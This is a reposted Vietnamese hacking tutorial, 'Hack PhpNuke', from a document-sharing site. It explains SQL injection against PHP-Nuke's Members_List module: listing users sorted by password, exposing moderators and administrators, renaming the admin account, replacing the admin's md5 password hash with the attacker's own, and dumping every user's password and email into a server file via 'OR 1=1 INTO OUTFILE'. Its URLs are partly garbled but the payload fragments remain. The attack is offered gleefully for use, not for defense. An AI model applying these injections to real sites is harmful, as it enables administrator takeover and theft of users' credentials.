TAILIEUCHUNG - Hack PhpNuke, Khai thác lỗi trong modules Members List

Trong Module Members_ListHiển thị tất cả thành viên được sắp xếp theo mật khẩu http:/// thị tất cả thành viên được sắp xếp theo UIDhttp:/// | Hack Php-Nuke, Khai thác lỗi trong modules Members List: trang này đã được đọc lần Khai thác lỗi trong module PHP-Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành viên và Admin. Cách khai thác như sau: Trong Module Members_List- Hiển thị tất cả thành viên được sắp xếp theo mật khẩu http:/// Hiển thị tất cả thành viên được sắp xếp theo UIDhttp:/// Hai câu truy vấn bên trên thì không có gì để để nói. Híc híc. Bây giờ là câu truy vấn thứ ba- Hiển thị tất cả Moderators http:///*- Hiển thị tất cả Administrator http:///*. *Khai thác Admin. Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn. Khà khà http:///*&uid=[OUR_UID] Chuyển đổi mật khẩu của Admin (md5). Để có được mật khẩu md5 của mình các bạn có thể tự tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5. Khỏi mất công viết cho mệt. Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là b6d0de971824629e987b84d513dc8af0 http:///*&uid=[OUR_UID] Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra. Hì hì Làm như trên thì mỗi lần ta chỉ làm cho một user thui. Vậy thì mệt quá, để lấy tất cả mật khẩu cũng như mail lưu thành tệp email chẳng hạn. Câu lệnh như sau sẽ lưu thông tin của user http:///)%20OR%201=1%20INTO%20OUTFILE%20//* Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host. để view file này thì đường dẫn nó là http:/// - Lưu tất cả thông tin của Admin vào một tệp http:///>1%20INTO%20OUTFILE%20// Đường dẫn để view trang này thì cũng như trên Tài liệu tham khảo: phpsecure

TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.